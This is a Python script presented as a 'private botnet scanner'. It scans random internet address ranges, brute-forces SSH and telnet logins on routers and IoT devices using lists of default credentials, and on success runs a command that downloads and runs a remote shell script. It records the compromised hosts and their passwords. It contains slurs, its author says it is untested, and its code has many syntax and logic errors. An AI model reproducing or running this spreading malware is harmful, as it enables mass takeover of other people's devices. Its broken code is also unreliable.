#!/usr/bin/python """ Author: ~B1NARY~ Skype: bl4ck.j3sus XMPP: b1nary@darkness.su Title: ~B1NARY~ PRIVATE BOTNET SCANNER Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD Version: 1.0 MADE DATE: 3-30-16 ***THIS HAS NOT BEEN TESTED YET, IT MAY OT MAY NOT WORK*** """ import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random from multiproccessing import Process paramiko.util.log_to_file("/dev/null") #DEFINES command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech'] passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor'] combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"] blacklist = ['127'] randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware', 'Start Adding Them Botz','Make The Bot Count Go Up', 'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!') thread = threading.Thread parser = argparse.ArgumentParser() args = parser.parse_args() thread_count = args.threadcount bufferz = '' start_time = time.time() host = HOST tn = socket.socket() #BANNER print '\r\n' print '###############################################################################' print '# ___ __________ ____ _______ _____ _______________.___. ___ #' print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #' print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #' print '# | | \ | / | \/ | \ | \\____ | #' print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #' print '# \/ \/ \/ \/ \/ #' print '###############################################################################' print 'r\n' raw_input('Press To '+randomtext) #ARGUMENTS parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs") parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS") parser.add_argument("-o","--output",type=str, help="OutputFile Name") parser.add_argument("-l","--load",type=str, help="Scan As Bruting") parser.add_argument("threadcount",type=str, help="# of Threads") #THE CODING BEGINS if args.brute: read_h = open(str(args.brute),'a+') elif args.brute: mass_check(args.brute) if args.load: sshscanner(args.load) elif args.load: brutethenload(args.load) if args.execute: mass_pwn(args.execute) class sshscanner(threading.Thread): global combolist ipclassinfo = sys.argv[2] global ipclassinfo if ipclassinfo == "A": ip1 = sys.argv[3] global ip1 elif ipclassinfo == "B": ip1 = sys.argv[3].split(".")[0] ip2 = sys.argv[3].split(".")[1] global ip1 global ip2 elif ipclassinfo == "C": ips = sys.argv[3].split(".") num=0 for ip in ips: num=num+1 if num == 1: ip1 = ip elif num == 2: ip2 = ip elif num == 3: ip3 = ip global ip1 global ip2 global ip3 def brutethenload(self): while 1: try: while 1: thisipisbad='no' if ipclassinfo == "A": self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "B": self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "C": self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) elif ipclassinfo == "BRAZIL": br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"] self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "SUPER": yeet = ["122","131","161","37","186","187","31","188","201","2","200"] self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY": lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"] self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY2": lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ] self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "GOOD": good = ["113.53","101.108","101.109"] self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "ALL" allips = ["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",] self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "RAND": self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) else: self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in blacklist: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break username='root' password="" port = 22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((self.host, port)) s.close() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) dobreak=False for passwd in combolist: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: ssh.connect(self.host, port = port, username=username, password=password, timeout=3) dobreak=True break except: pass if True == dobreak: break badserver=True stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'") output = stdout.read() if "gayfgt" in output: badserver=False if badserver == False: print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port) ssh.exec_command(""+command+"") time.sleep(15) file_h = open(sys.argv[4],'a') file_h.write(self.host+":"+username+":"+password+"\n") file_h.close() ssh.close() except: pass def sock_read_until(tn, criteria, timeout=30): while time.time() - start_time < timeout: bufferz += tn.recv(40960) time.sleep(0.01) if criteria in bufferz: return bufferz raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m') def mass_check(read_h): try: for line in open(read_h).readlines()) ip_info = line.split(":") e = Thread(target=f, args=(ip_info[0],)) e.start() print threading.active_count() print threading.active_count() > thread_count: pass except KeyboardInterrupt: os.kill(os.getpid(),9) def mass_pwn(targets_file): try: targets_file_h = open(targets_file).readlines() for line in targets_file_h: ip_info = line.split(":") try: e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2])) e.start() except: pass print '[Thread]: ',threading.active_count() while threading.active_count() > thread_cnt: pass except KeyboardInterrupt: os.kill(os.getpid(),9) def loadem(HOST,user,password): try: x = '' tn.connect((HOST,22)) print tn.recv(40960) tn.send(user + "\n") time.sleep(1) print sock_read_until(tn,":",10) tn.send(password + "\n") print "Spraying"+HOST tn.send("sh\n\n") time.sleep(0.01) x += sock_read_until(tn,"#",10) print '[+] Got shell! '+HOST if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked') for line in command("\n"): tn.send(line+'\r\n'): x = tn.recv(40960) if '> ' in x: raise Exception try: arch = sock_read_until(tn,"#",3) except: arch = 'ILLEGAL!!!' print arch return arch except: pass def f(ip): ip = ip_rstrip() for user in userlist: for passw in passlist: x= '' try: tn.settimeout(35) tn.connect((ip,22)) except Exception as e: print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e break else: try: x += tn.recv(40960) except: print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e break else: try: time.sleep(0.1) x += tn.recv(40960) sio = StringIO.StringIO(x) try: for i in sio.read(x) if ord(i) == 251: iac_dont_b = 1 elif ord(i) == 253: iac_dont_b = 1 elif iac_wont_b == 1: iac_wont(tn,ord(i)) iac_wont_b = 01 elif iac_dont_b = 1: iac_dont(tn,ord(i)) iac_dont_b = 0 except: print "THATS ILLEGAL!!!" tn.send(user + "\r\n") time.sleep(0.01) if 'User Access Verification' in x: raise Exception('cisco dicks') x += tn.recv(409600) tn.send("sh\n\n") time.sleep(0.01) tn.send("shell\n\n") time.sleep(0.01) sock_read_until(tn,"#") tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n") time.sleep(0.01) x += tn.recv(409600) time.sleep(0.01) try: x += sock_read_until(tn,"binfagt") if 'binfagt' not in x: raise Exception('no binfagt') if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt') if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked') except: print "[failed execution]",e,ip.rstrip() continue else: file_h = open(args.output,'a+') file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n') file_h.close() print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip break except Execution as e: continue continue continue continue return for x in range(0,int(sys.argv[1])): try: t = sshscanner() t.start() except: pass self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in blacklist: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break